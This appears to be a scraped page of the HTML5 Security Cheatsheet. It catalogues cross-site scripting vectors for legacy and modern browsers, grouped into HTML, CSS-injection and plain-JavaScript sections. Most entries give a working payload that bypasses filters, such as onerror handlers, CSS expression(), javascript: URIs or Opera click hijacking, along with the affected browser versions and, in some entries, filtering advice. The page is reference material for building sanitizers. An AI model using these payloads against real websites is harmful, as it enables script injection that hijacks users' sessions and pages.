                                          • mhtml
                                          Bolk, LeverOne

                                          XSS using "xmlns" attribute in custom tag when copying innerHTML (2)#97test

                                          Internet Explorer incorrectly analyzes the attribute "xmlns" in custom tags when copying innerHTML - its value is being added to the tag <?XML:NAMESPACE> without any delimiters.

                                          <!-- IE 5-9 --> <div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML+='';</script> <!-- IE 10 in IE5-9 Standards mode --> <div id=d><x xmlns='"><iframe onload=alert(2)//'></div> <script>d.innerHTML+='';</script>

                                          Be very careful when handling user generated HTMl in the DOM later on. The innerHTML property does not always contain what it's supposed to.

                                            • Internet Explorer 6.0
                                            • Internet Explorer Latest (In Older Docmodes)
                                          • xss
                                          • javascript
                                          • internet explorer
                                          • script
                                          • dom
                                          • innerhtml
                                          LeverOne

                                          HTML separators and ignored characters#100test

                                          [a] Characters accepted as tag name/attribute separators. Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32,47 Internet Explorer (5-9 SM): 11 [b] Characters ignored before attributes (and not accepted as parameter/attribute separators). Firefox, Internet Explorer, Safari, Google Chrome, Opera : 47 Internet Explorer (5-9 SM): 0** [c] Characters ignored between attribute name and equals sign. Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer (5-9 SM): 0,11 [d] Characters accepted as parameter/attribute separators. Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer (5-9 SM): 11 [e] Characters ignored between equals sign and parameter. Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer (5-9 SM): 0,11 * Characters are given as decimal ASCII table index. ** There is a common rule that the unencoded null character does not exist for IE HTML parser.

                                          <img[a][b]src=x[d]onerror[c]=[e]"alert(1)">

                                            • Internet Explorer 6.0
                                            • Internet Explorer Latest (In Older Docmodes)
                                            • Firefox 4.0
                                            • Firefox Latest
                                            • Opera 9.X
                                            • Opera Latest
                                            • Chrome 5.0
                                            • Chrome Latest
                                            • Safari 4.0
                                            • Safari Latest
                                          • xss
                                          • internet explorer
                                          • firefox
                                          • opera
                                          • chrome
                                          • safari
                                          • separator
                                          hasegawayosuke, .mario, RSnake,

                                          Characters ignored in the URI scheme#101test

                                          The following characters* are ignored in the URI sheme: [a] All mentioned browsers: 9,10,13,32 IE, GC, Safari, Opera: 11,12 IE, GC, Safari, FF 3.6.28↓: 8 IE, GC, Safari: 1-7,14-31 Opera: 160,5760,6158,8192-8202,8232,8233,8239,8287,12288 Opera 11.52↓: 6159 IE (5-9 SM): 0 [b],[c] IE, GC, Safari 4.0.3↓, FF 4-6, Opera 10.63↓: 9,10,13 GC 7↓, Safari 4.0.3↓: 1-8,11,12 IE (5-9 SM): 0 Safari 4.0.4↑, Opera 11↑, FF 7↑: nothing * Characters are given as decimal ASCII table index.

                                          <a href="[a]java[b]script[c]:alert(1)">XXX</a>

                                            • Internet Explorer 6.0
                                            • Internet Explorer Latest
                                            • Firefox 4.0
                                            • Firefox Latest
                                            • Opera 10.0
                                            • Opera Latest
                                            • Chrome 5.0
                                            • Chrome Latest
                                            • Safari 4.0
                                            • Safari Latest
                                          • xss
                                          • javascript
                                          • internet explorer
                                          • script
                                          • chrome
                                          • safari
                                          Gareth, .mario, RSnake

                                          Forced plaintext via unbalanced quotes in Internet Explorer#102test

                                          Internet Explorer treats any tag as plaintext in case the attribute delimiters are unbalanced - in this example caused by the ` `. In unbalanced quotes appear inside or outside an attributes - preceded by an arbitrary character but the equals sign - the usage of HTML inside attributes is possible and the content will be rendered as regular HTML. The problem has been reported and will be taken care of in later versions of the Internet Explorer.

                                          <img src="x` `<script>alert(1)</script>"` `>

                                            • Internet Explorer 6.0
                                            • Internet Explorer 8.0 (Unpatched)
                                          • xss
                                          • javascript
                                          • internet explorer
                                          • parser
                                          • backtick
                                          • plaintext
                                          .mario, hasegawayosuke

                                          Safari attribute ofuscation with slashes and quotes#106test

                                          Safari accepts slashes and quotes (if preceded by whitespace, slashes or other quotes) between attribute names and the equals character (name/"'=value). This enables interesting possibilities to obfuscate HTML strings, bypass filters and mimick attributes like in the given example.

                                          <img src onerror /" '"= alt=alert(1)//">

                                            • Safari 4.0
                                            • Safari 4.0.3
                                          • xss
                                          • javascript
                                          • safari
                                          • attributes
                                          • delimiter
                                          • parser
                                            Superhei, .mario

                                            JavaScript execution via <TITLE> tag on Inernet Explorer 9#107test

                                            Internet Explorer 9 allows execution of JavaScript via onpropertychange event handler on <title> tags if another <title> tag follows up - having at least one valid attribute. This vector works in IE6-8 Standards mode and in IE9 quirks mode.

                                            <title onpropertychange=alert(1)></title><title title=></title>

                                              • Internet Explorer 6.0
                                              • Internet Explorer Latest (In Older Docmodes)
                                            • xss
                                            • javascript
                                            • title
                                            • onpropertychange
                                            • internet explorer
                                              .mario

                                              Internet Explorer parameter parsing issue#108test

                                              Internet Explorer treats the sequence of any quotes that follows the equal sign in a parameter without delimiters as the beginning of some semblance of new parameter.

                                              <!-- IE 5-8 standards mode --> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>"> <!-- IE 5-9 standards mode --> <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"> <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">

                                                • Internet Explorer 6.0
                                                • Internet Explorer Latest (In Older Docmodes)
                                              • xss
                                              • javascript
                                              • parameter
                                              • parsing
                                              • internet explorer
                                              Algol, jackmasa, sirdarckcat

                                              Internet Explorer conditional comments - XSS via [if]> and <img> injection#115test

                                              Conditional comments on Internet Explorer can cause trouble as soon as an attacker is able to inject rectangular brackets wrapping the words if and endif with almost arbitrary suffixes. A condition always being true will lead to immediate parsing of the enclosed markup on all tested Internet Explorer versions. The second example injects an <img> tag into the comment condition leading to immediate JavaScript execution as well. The examples are worked up to IE 9 standards mode.

                                              <!--[if]><script>alert(1)</script --> <!--[if<img src=x onerror=alert(2)//]> -->

                                              Make sure an attacker cannot turn a comment injection into a conditional comment by using rectangular brackets such as shown in the example. Comment content should be escaped like regular markup - the delimiting sequence --> is neither sufficient nor necessary to successfully close a comment.

                                                • Internet Explorer 6.0
                                                • Internet Explorer Latest (In Older Docmodes)
                                              • xss
                                              • conditional
                                              • comments
                                              • internet explorer
                                              • rectangular
                                              .mario

                                              Backslashes as alternative to slashes on Webkit#124test

                                              Safari treats backslashes the same way as slash inside URL attributes. Chrome treats prefix "/\" of URL the same way as "//".

                                              <script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10 <script src="\\example.com\foo.js"></script> // Safari 5.0

                                                • Chrome 9.0
                                                • Chrome Latest
                                                • Safari 5.0
                                                • Safari Latest
                                              • html
                                              • dom
                                                hasegawayosuke

                                                QuickTime events causing JavaScript execution#126test

                                                The below displayed construct enables usage of the more or less unknown QuickTime DOM events. Those contain an underscore - which is rather uncommon for event handlers and thus bypasses many blacklist based filters. The attack only works if both <object> tags are in place - and <object> tag 1 supplys the necessary behavior for object tag two.

                                                <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>

                                                  • Internet Explorer 6.0
                                                  • Internet Explorer 10.0
                                                • quicktime
                                                • html
                                                • event
                                                • object
                                                • classid
                                                • xss
                                                .mario

                                                Ending HTML comments with a backtick character#133test

                                                On older versions of the Internet Explorer, a backtick charcater can be utilized to end a HTML comment and inject otherwise commented markup. A HTML filter allowing comments can be bypassed with this trick and allow an attacker to inject arbitrary HTML.

                                                <!-- `<img/src=xx:xx onerror=alert(1)//--!>

                                                Make sure, an attacker cannot inject into HTML comments and consider the string "-->" by far not the only way to end a HTML comment.

                                                  • Internet Explorer 6.0
                                                  • Internet Explorer 8.0
                                                • xss
                                                • comments
                                                • internet explorer
                                                • backtick
                                                jackmasa

                                                "<% %>" and "<!-- -->" inside plaintext tags#134test

                                                Structures "<%" и "<!--" allow the IE parser to consider closing tag in plaintext tags such as <textarea>, <comment>, <xmp> and others as a part of the plaintext until it finds the structure "%>" or "-->". The syntax in the tags such as <style>, <script> should be valid taking into account these sections, otherwise throws an exception. So, the second example shows that closing </script> tag will be considered as an operator "less" and the regular expression start. The examples are worked up to IE 9 standards mode. SGML-like comment delimiters is similarly parsed in older versions of Safari.

                                                <xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=alert(1)//'> <script> x='<%' </script> %>/ alert(2) </script> XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>

                                                Encode all opening brakets inside plaintext tags. Escape for the closing tags ("<\/script>") is not sufficient.

                                                  • Internet Explorer 6.0
                                                  • Internet Explorer Latest (In Older Docmodes)
                                                  • Safari 3.0
                                                  • Safari 4.0.3
                                                • xss
                                                • plaintext
                                                • internet explorer
                                                • safari
                                                • comment
                                                • SGML
                                                • escape
                                                sirdarckcat, wpulog

                                                JavaScript execution via <FRAMESET> and onpageshow#146test

                                                The <FRAMESET> element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known. Note, that the same behavior is exposed by the <BODY> tag as well.

                                                <frameset onpageshow="alert(1)"> <body onpageshow="alert(1)">

                                                Be sure to work with whitelists when allowing users to submit markup - else ancient tags like <FRAMESET> might be forgotten to filter and escape.

                                                  • Chrome 4.0
                                                  • Chrome Latest
                                                  • Opera 12.0
                                                  • Opera Latest
                                                  • Internet Explorer 9.0
                                                  • Internet Explorer Latest
                                                  • Firefox 4.X
                                                  • Firefox Latest
                                                  • Safari 4.0
                                                  • Safari Latest
                                                • frameset
                                                • onpageshow
                                                • html
                                                • legacy
                                                  Qab

                                                  JavaScript execution via <APPLET> with error events#149test

                                                  The <APPLET> element fires an "onerror" event without user interaction on Internet Explorer and Edge. This can be used to bypass WAF and IDS systems as this combination of tag and attributes is meanwhile rather uncommon and unknown.

                                                  <applet onerror="alert(1)"></applet>

                                                  Be sure to work with whitelists when allowing users to submit markup - else legacy tags like <APPLET> might be forgotten to filter and escape.

                                                    • Internet Explorer 11.0
                                                    • Internet Explorer Latest
                                                  • applet
                                                  • onerror
                                                  • html
                                                  • legacy
                                                    Ben Hayak
                                                  • Cascading stylesheet injection based vectors

                                                    Opera link-source JavaScript execution via CSS#9test

                                                    Opera allows setting link sources for arbitrary HTML elements - making them clickable and execute JavaScript. Note that Opera 11.0-11.01 requires an actual <a> tag to have this work - while earlier versions work with other tags too. For later versions still available a data URI.

                                                    <a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>

                                                      • Opera 8.0
                                                      • Opera 12.0 (Limited)
                                                    • xss
                                                    • css
                                                    • link-source
                                                    • opera
                                                    • proprietary
                                                    .mario

                                                    Opera whole-page click hijacking via CSS#27test

                                                    Opera as well as other browsers allow to break out attribute selectors and other CSS constructs with {...} - opening the possibility for declaring new properties and assigning values - such as -o-link and -o-link-source. In this case those proprietary properties allow overlaying any selected element with a JavaScript URI link href. Note that as of Opera 11 -o-link only applies for <a> tags. On IE selector is broken up to IE 7 standards mode.

                                                    <style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>

                                                    In case users are allowed to submit CSS make sure the properties allowed are whitelisted and attribute selector content does not allow the combination {...} because it breaks out the attribute selector and allows declaration of new properties.

                                                      • Opera 8.X
                                                      • Opera 11.64
                                                    • xss
                                                    • javascript
                                                    • css
                                                    • opera
                                                    • attribute selectors
                                                    • proprietary
                                                    .mario

                                                    JavaScript execution via <LINK> href attribute and data URI#29test

                                                    Despite the existing documentation Internet Explorer 8 supports data URIs not only for displaying images but also supplying stylesheet information. This can be used to wrap expression() CSS into a data URI and execute JavaScript with a <LINK> tag. The example works up to IE 7 standards mode.

                                                    <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d

                                                    Make sure stylesheet URIs cannot be controlled by the user - and user submitted <LINK> tags will not be displayed unfiltered.

                                                      • Internet Explorer 8.0
                                                      • Internet Explorer 10.0
                                                    • xss
                                                    • javascript
                                                    • internet explorer
                                                    • css
                                                    • style
                                                    • expression
                                                    • datauri
                                                    • proprietary
                                                      .mario

                                                      JavaScript execution via <STYLE> @import and data URI#30test

                                                      Despite the existing documentation Internet Explorer 8 supports data URIs not only for displaying images but also supplying stylesheet information. This can be used to wrap expression() CSS into a data URI and execute JavaScript with a <STYLE> @import directive. The example works up to IE 7 standards mode.

                                                      <style>@import "data:,*%7bx:expression(write(1))%7D";</style>

                                                      Make sure stylesheet URIs cannot be controlled by the user - and user submitted <STYLE> cannot contain the @import directive.

                                                        • Internet Explorer 8.0
                                                        • Internet Explorer 10.0
                                                      • xss
                                                      • javascript
                                                      • internet explorer
                                                      • css
                                                      • style
                                                      • expression
                                                      • datauri
                                                      • proprietary
                                                      .mario

                                                      Breaking pointer-events:none with nested links#33test

                                                      Firefox 3.6+ allows using CSS "pointer-events" with value "none" to make sure an element will not react on any mouse/pointer based event. This feature enables for example placing a DIV over another DIV without blocking the click events addressed to the underlying DIV.

                                                      <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>

                                                      The feature breaks as soon as <A> elements are being used in combination with "pointer-events:none" - containing other <A> elements. <A> elements should not be used for pointer-event logic at all - especially not when containing user controlled HTML.

                                                        • Firefox 3.6
                                                        • Firefox Latest
                                                        • Safari 5.0
                                                        • Safari Latest
                                                        • Chrome 7.0
                                                        • Chrome Latest
                                                        • Internet Explorer 10.0
                                                        • Internet Explorer Latest
                                                        • Opera 10.0
                                                        • Opera Latest
                                                      • xss
                                                      • hijacking
                                                      • css
                                                      • pointer-events
                                                      • firefox
                                                      • safari
                                                      • chrome
                                                      .mario

                                                      Opera @import based XSS inside attribute selectors#44test

                                                      Opera 10 and later version including latest Opera 10.5 allow breaking out an attribute selector with {} and use @import declarations afterwards. The MIME type for the imported file does not matter - also it can be loaded from arbitrary domains. The imported file contains CSS code to apply a JavaScript URI to all elements on the page to hijack any incoming click.

                                                      <style>*[{}@import'test.css?]{color: green;}</style>X

                                                      Make sure in user submitted CSS the contents of attribute selectors are properly escaped with backslashes. Also make sure to use a CSS property:value whitelist to forbid properties like -o-link and -o-link-source.

                                                      * {-o-link:'javascript:alert(1)';-o-link-source: current;}crossdomain: 1path: http://html5sec.org/test.cssname: test.css
                                                        • Opera 8.0
                                                        • Opera 11.64
                                                      • xss
                                                      • javascript
                                                      • opera
                                                      • css
                                                      • hijacking
                                                      • proprietary
                                                        .mario

                                                        CSS-string breaking#45test

                                                        Opera, Firefox and other browsers allow breaking out an css-string with newline symbols. A string cannot directly contain a newline in CSS2+. [a] Characters*, accepted as CCS-strings breakers: Firefox, Internet Explorer (IE8+ standards mode), Opera, Google Chrome, Safari: 10,12,13 Opera 11.01↓, Google Chrome 16↓, Safari: 1-8,11,14-31,127 Opera 11.01↓: 0 * Characters are given as decimal ASCII table index.

                                                        <div style="font-family:'foo[a];color:red;';">XXX</div>

                                                          • Opera 8.0
                                                          • Opera Latest
                                                          • Firefox 1.X
                                                          • Firefox Latest
                                                          • Chrome 3.0
                                                          • Chrome Latest
                                                          • Safari 3.0
                                                          • Safari Latest
                                                          • Internet Explorer 8.0
                                                          • Internet Explorer Latest
                                                        • trick
                                                        • opera
                                                        • firefox
                                                        • chrome
                                                        • firefox
                                                        • internet explorer
                                                        • css
                                                          LeverOne, Michal Zalewski

                                                          Alternative CSS syntax in Internet Explorer#46test

                                                          Internet Explorer allows to use right curly brace (}) as a group separator (up to IE 7 standards mode). A CSS declaration in quirks mode (IE 5 standards mode) may consist of a property name, followed by a symbol of equality (=).

                                                          <div style="font-family:foo}color=red;">XXX</div>

                                                            • Internet Explorer 5.5
                                                            • Internet Explorer Latest (In Older Docmodes)
                                                          • xss
                                                          • internet explorer
                                                          • css
                                                          • quirks mode
                                                          • proprietary
                                                          • trick
                                                            Gareth, LeverOne, sirdarckcat

                                                            Obfuscation css-properties and values via ignored extra characters#60test

                                                            [a] Extra characters* ignored before property names (excluding backslash (92) and null character (0)) Firefox, Internet Explorer (any modes), Safari, Google Chrome, Opera : 9,10,12,13,32 Firefox, Internet Explorer**, Opera: 123*** Firefox 3.x, Internet Explorer**: 8 Internet Explorer**: 1-7,11,14-31,33,35-38,40-44,46-47,58,60-64,91,93-96,124-127,160,8192-8203,12288,65279 Internet Explorer**: CSS-strings [b] Extra characters ignored between property names and colon. Firefox, Internet Explorer (any modes), Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer**: 11 Internet Explorer (quirks mode): 1-8,14-31,33,35-38,40-44,46-47,60,62-64,91,93,94,96,123,124,126,127 Internet Explorer (quirks mode): CSS-strings, alnum sequences after non-alnum characters (color,foo:red) [c] Extra characters ignored before values Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer: 0,11,160,8192-8203,12288,65279 * These are given in decimal codes. ** Up to IE 7 standards mode. *** Ignored only before first property names.

                                                            <div style="[a]color[b]:[c]red">XXX</div>

                                                              • Firefox 2.X
                                                              • Firefox Latest
                                                              • Opera 9.X
                                                              • Opera Latest
                                                              • Internet Explorer 6.0
                                                              • Internet Explorer Latest
                                                              • Chrome 5.0
                                                              • Chrome Latest
                                                              • Safari 4.0
                                                              • Safari Latest
                                                            • trick
                                                            • css
                                                            • quirks mode
                                                            • obfuscation
                                                            • opera
                                                            • firefox
                                                            • internet explorer
                                                            • chrome
                                                            • safari
                                                            • fuzzing
                                                            • quirks mode
                                                              Gareth, hasegawayosuke, LeverOne, .mario, RSnake, sirdarckcat

                                                              CSS encoding and escaping#61test

                                                              [a] Encoding. There are only three tricks to encode characters. [1] You can change the number of zeros: \0A -> \00000A [2] You can change the capital letter: \0A -> \0a [3] You can change the whitespace* accepted as delimiters after the encoded character. Firefox, Google Chrome, Internet Explorer, Opera, Safari: 9,10,12,13,32 Internet Explorer (IE7↓ Standards mode): 11,160,8192-8203,12288,65279 Properties in IE7↓ Standards mode may contain encoded null-character (\0). On Opera and in IE8+ Standards mode encoded null-character cuts off the right side of a CSS structure. The volume of possible encoding is different in the browsers. For example, FF can not encode parentheses, which is part of the functional notation. [b] Escaping. In addition, you can put a backslash before the character. Option of writing a null-character in Internet Explorer 7↓ Standards mode is escaping of any whitespace-character accepted as delimiters: col\&#160or:red In IE quirks mode inside the url() function a backslash can be treated as equivalent of a slash and thus will not have the escape role. Of course, these methods can be combined with other encoding and obfuscation (for example, change case of original characters). * These are given in decimal codes.

                                                              <div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>

                                                                • Firefox 1.5
                                                                • Firefox Latest
                                                                • Opera 8.0
                                                                • Opera Latest
                                                                • Internet Explorer 6.0
                                                                • Internet Explorer Latest
                                                                • Chrome 7.0
                                                                • Chrome Latest
                                                                • Safari 4.0
                                                                • Safari Latest
                                                              • xss
                                                              • javascript
                                                              • css
                                                              • encoding
                                                              • escape
                                                              • backslash
                                                              • opera
                                                              • firefox
                                                              • internet explorer
                                                              Gareth, LeverOne, Renaud Lifchitz, .mario

                                                              Slash-tags accepting style attributes#71test

                                                              A slash-tag can still contain style attributes on IE as the example shows. For extra obfuscation a bogus CSS property is being used to execute the JavaScript via expression() combined with CSS escapes. This example works up to IE 7 standards mode.

                                                              <// style=x:expression\28write(1)\29>

                                                              Make sure the HTML filter you use deals with slash-tags and doesn't consider them to be plain text. Also be aware of CSS escapes and how they can completely obfuscate any style info inside <STYLE> tags and "style" attributes.

                                                                • Internet Explorer 6.0
                                                                • Internet Explorer 10.0
                                                              • xss
                                                              • javascript
                                                              • closing tag
                                                              • css
                                                              • style
                                                              • expression
                                                              • internet explorer
                                                              • quirks mode
                                                              Gareth, .mario

                                                              IE6 and halfwidth/fullwidth Unicode characters#80test

                                                              This example shows how halfwidth/fullwidth Unicode characters can be used on IE6 to substitute characters from the ASCII range. Note that those characters have been used in the example to create the term "expression".

                                                              <style>*{x:expression(write(1))}</style>

                                                              In case your website still has a lot of IE6 users make sure that the range of halfwidth and fullwidth form characters (U+FF00-FFEF) cannot be used in user submitted markup and styles.

                                                                • Internet Explorer 6.0
                                                              • xss
                                                              • javascript
                                                              • css
                                                              • expression
                                                              • unicode
                                                              • halfwidth
                                                              • fullwidth
                                                              • internet explorer
                                                              .mario

                                                              SVG images containing XML data - with disabled JavaScript#90test

                                                              Opera supports the CSS property "content" for style attributes. The SVG image can contain SVG as well as HTML code. The example for Opera 10.x shows how a <FORM> tag can be used to trick the user into clicking a button and thus executing JavaScript. Example for Opera 12.x shows one of the problems (along with a client side DoS, running the "onblur" event, etc), which is generated because of the possibility to steal a focus via embeded SVG image. The same works of course for SVG files embedded via <IMG> tags.

                                                              <!-- Up to Opera 10.63 --> <div style=content:url(test2.svg)></div> <!-- Up to Opera 11.64 - see link below --> <!-- Up to Opera 12.x --> <div style="background:url(test5.svg)">PRESS ENTER</div>

                                                              <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)"> <!-- this file can be crossdomain if "action" attribute refers to an external file --> <meta http-equiv="refresh" content="1;URL=test5.svg"/> <input type="submit" autofocus="autofocus"/> </form>required_mime: image/svg+xmlcrossdomain: 0path: http://html5sec.org/test5.svgname: test5.svg
                                                                • Opera 10.X
                                                                • Opera 12.0
                                                              • xss
                                                              • svg
                                                              • css
                                                              • opera
                                                              • content
                                                              • form
                                                              LeverOne

                                                              Breaking the functional notation on IE (1)#92test

                                                              To break the functional notation on IE "url()" can be used combined with a following whitespace - then followed by any non-whitespace character. The following characters* are whitespaces: IE 6,7 standards mode: 9-13,32,160,8192-8203,12288,65279 IE 8 standards mode: 1-32,127 * These are given in decimal codes.

                                                              <div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>

                                                                • Internet Explorer 6.0
                                                                • Internet Explorer Latest (In Older Docmodes)
                                                              • xss
                                                              • css
                                                              • internet explorer
                                                              • trick
                                                              • notation
                                                              LeverOne

                                                              Multiple CSS "url()" values in IE 6#93test

                                                              Internet Explorer supports multiple "url()" values all of which can contain payload. The delimiter between the "url()" values should be a whitespace character ("\x20" in the given example).

                                                              <div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>

                                                              Make sure in case the user is allowed to submit CSS it is being filtered and whitelisted correctly to avoid attacks via multiple backgrounds.

                                                                • Internet Explorer 6.0
                                                              • xss
                                                              • css
                                                              • internet explorer
                                                              • trick
                                                              • url
                                                                LeverOne

                                                                Style injection when copying innerHTML (3)#98test

                                                                The example shows that Internet Explorer and Mozilla Firefox automaticaly decode CSS-encoding if the harmless markup is copied using innerHTML.

                                                                <div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>

                                                                Be very careful when handling user generated HTMl in the DOM later on. The innerHTML property does not always contain what it's supposed to.

                                                                  • Internet Explorer 6.0
                                                                  • Internet Explorer Latest (In Older Docmodes)
                                                                  • Firefox 2.X
                                                                  • Firefox 3.6.28
                                                                • xss
                                                                • javascript
                                                                • internet explorer
                                                                • script
                                                                • dom
                                                                • innerhtml
                                                                • css
                                                                sirdarckcat

                                                                Using comments to obfuscate styles#99test

                                                                As noted in CSS2.1 specification (and repeated in CSS3), comments may occur anywhere outside other tokens. The cases that are exceptions to this rule are a subject to special attention. First of all the CSS2.1 specification is inconsistent, since, for example, the "!important" token in his definition allows comments. Despite the exclusion this feature in CSS3, IE (8-9 standards mode) and Firefox 13 still support "!/**/important". You can find more obvious mistakes, for example, the same Firefox 13 allows "font-family: Ar/**/ial". Special interest are exceptions to this rule in IE. The first example shows the possibility for comments in the value of the property. The third example, in addition to demonstrating a similar possibility inside the "url()" function, is also an interesting case, when a comment can not be replaced by any other structure (another space or encoded space "\000020" will not give necessary effect). Typically these cases occur when the token does not match your precise definition. In this example token "url" can not contain a space character. Inside the <STYLE> tag, there are rules for parsing the SGML comment delimiters, that are allowed before and after statements regardless of the form (opening/closing) and nesting.

                                                                XXX<style> *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ <!-- --><!--*{color:red} /* all UA */ *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ </style>

                                                                  • Internet Explorer 6.0
                                                                  • Internet Explorer Latest
                                                                  • Firefox 3.X
                                                                  • Firefox Latest
                                                                  • Opera 9.X
                                                                  • Opera Latest
                                                                  • Chrome 4.0
                                                                  • Chrome Latest
                                                                  • Safari 3.0
                                                                  • Safari Latest
                                                                • trick
                                                                • css
                                                                • obfuscation
                                                                • internet explorer
                                                                • firefox
                                                                • opera
                                                                • chrome
                                                                • safari
                                                                • comment
                                                                Roman Ivanov, LeverOne

                                                                Breaking the functional notation on Chrome and Safari (2)#111test

                                                                To break the functional notation "url()" can be used in combination with the following characters*: [a] 1-8,10-31,127,9,32,40 Note that simultaneous breaking of functional notation and strings can be accomplished by the characters listed in #45. * Characters are given as decimal ASCII table index.

                                                                <div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>

                                                                  • Chrome 5.0
                                                                  • Chrome Latest
                                                                  • Safari 4.0
                                                                  • Safari Latest
                                                                • xss
                                                                • css
                                                                • google chrome
                                                                • safari
                                                                • trick
                                                                • notation
                                                                LeverOne, .mario

                                                                Breaking the functional notation on IE (3)#112test

                                                                If any* part of the CSS-declaration (property or value) contains a left curly brace ({ - not as part of a string), the CSS declaration cannot be closed without using a matching right curly brace (}). In most browsers this feature can not be used to bypass filters - as they require to close the strings, functions and attributes inside blocks. IE nevertheless does not require to close function inside such blocks. It is important to take into account especially when filtered styles are inside the targeted tag's attribute. The example works up to IE 7 standards mode. *There's another exception for IE (see the letters [a] and [b] of #60).

                                                                <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>

                                                                  • Internet Explorer 6.0
                                                                  • Internet Explorer Latest (In Older Docmodes)
                                                                • xss
                                                                • css
                                                                • internet explorer
                                                                • trick
                                                                • notation
                                                                LeverOne

                                                                Jump into the selector via attribute delimiters#113test

                                                                According to established practice selectors are usually filtered less thoroughly by filtering software than other parts of CSS language constructs. This example shows how to leave a CSS-block open to get hands on a selector and inject code into a possibly less thoroughly filtered area. On IE this example works in IE 8-9 standards mode.

                                                                <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>

                                                                  • Firefox 2.X
                                                                  • Firefox Latest
                                                                  • Opera 9.X
                                                                  • Opera 12.0
                                                                  • Internet Explorer 8.0
                                                                  • Internet Explorer Latest (In Older Docmodes)
                                                                • xss
                                                                • css
                                                                • firefox
                                                                • opera
                                                                • trick
                                                                • selector
                                                                • attribute
                                                                LeverOne

                                                                Breaking the functional notation on Chrome and Safari (4)#114test

                                                                The functional notation breaker shown in #111 also works with quoted strings for several CSS properties. The following characters can be used to break the string and create a new property-value pair: [a] Safari, Chrome 16↓: 1-8,10-31 and 127 Chrome 17↑: 10,12,13 (decimal ASCII table index)

                                                                <x style="background:url('x[a];color:red;/*')">XXX</x>

                                                                  • Chrome 5.0
                                                                  • Chrome Latest
                                                                  • Safari 4.0
                                                                  • Safari Latest
                                                                  • Opera 15.0
                                                                  • Opera Latest
                                                                • xss
                                                                • css
                                                                • google chrome
                                                                • safari
                                                                • trick
                                                                • notation
                                                                .mario, LeverOne
                                                              • Plain JavaScript vectors

                                                                Firefox setter based JavaScript execution#6test

                                                                Using setters on Gecko/Firefox to execute JavaScript without parenthesis

                                                                <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>

                                                                  • Firefox 1.X
                                                                  • Firefox 3.6.28
                                                                • xss
                                                                • dom
                                                                • firefox
                                                                • setter
                                                                • proprietary
                                                                .mario

                                                                JavaScript execution via sharp variables#15test

                                                                This vector demonstrates how sharp variables and cyclic references can be used for obfuscation to hide the actual method execution.

                                                                <script>({0:#0=alert/#0#/#0#(0)})</script>

                                                                  • Firefox 2.X
                                                                  • Firefox 11.0
                                                                • xss
                                                                • javascript
                                                                • firefox
                                                                • sharp
                                                                • proprietary
                                                                .mario

                                                                JavaScript execution via overwritten ReferenceError object#20test

                                                                This JavaScript vector shows how overwriting the ReferenceError object and causing the exact same kind of error afterwards can lead to JavaScript execution. This is of course the same for most other error objects and should be taken into consideration when implementing JavaScript sandboxes or comparable.

                                                                <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>

                                                                Do not trust the DOM in case the user can influence it via script injections, includes or other DOM based property access.

                                                                  • Opera 8.X
                                                                  • Opera 11.01
                                                                  • Firefox 1.X
                                                                  • Firefox 15.0
                                                                  • Chrome 3.0
                                                                  • Chrome 9.0
                                                                  • Safari 4.0
                                                                  • Safari 5.1.7
                                                                • javascript
                                                                • opera
                                                                • firefox
                                                                • chrome
                                                                • safari
                                                                • ReferenceError
                                                                • overwrite
                                                                .mario

                                                                JavaScript execution via proprietary __noSuchMethod__#21test

                                                                Firefox supports the non-standard __noSuchMethod__ property which will be used as an interceptor as soon as a non existing object method is being called. It can be assigned with the Function object to force JavaScript execution without using function(){...}.

                                                                <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>

                                                                  • Firefox 3.5
                                                                  • Firefox Latest
                                                                • xss
                                                                • javascript
                                                                • firefox
                                                                • __noSuchMethod__
                                                                • proprietary
                                                                Gareth, .mario

                                                                Spoofing the address bar information with history.replaceState()#103test

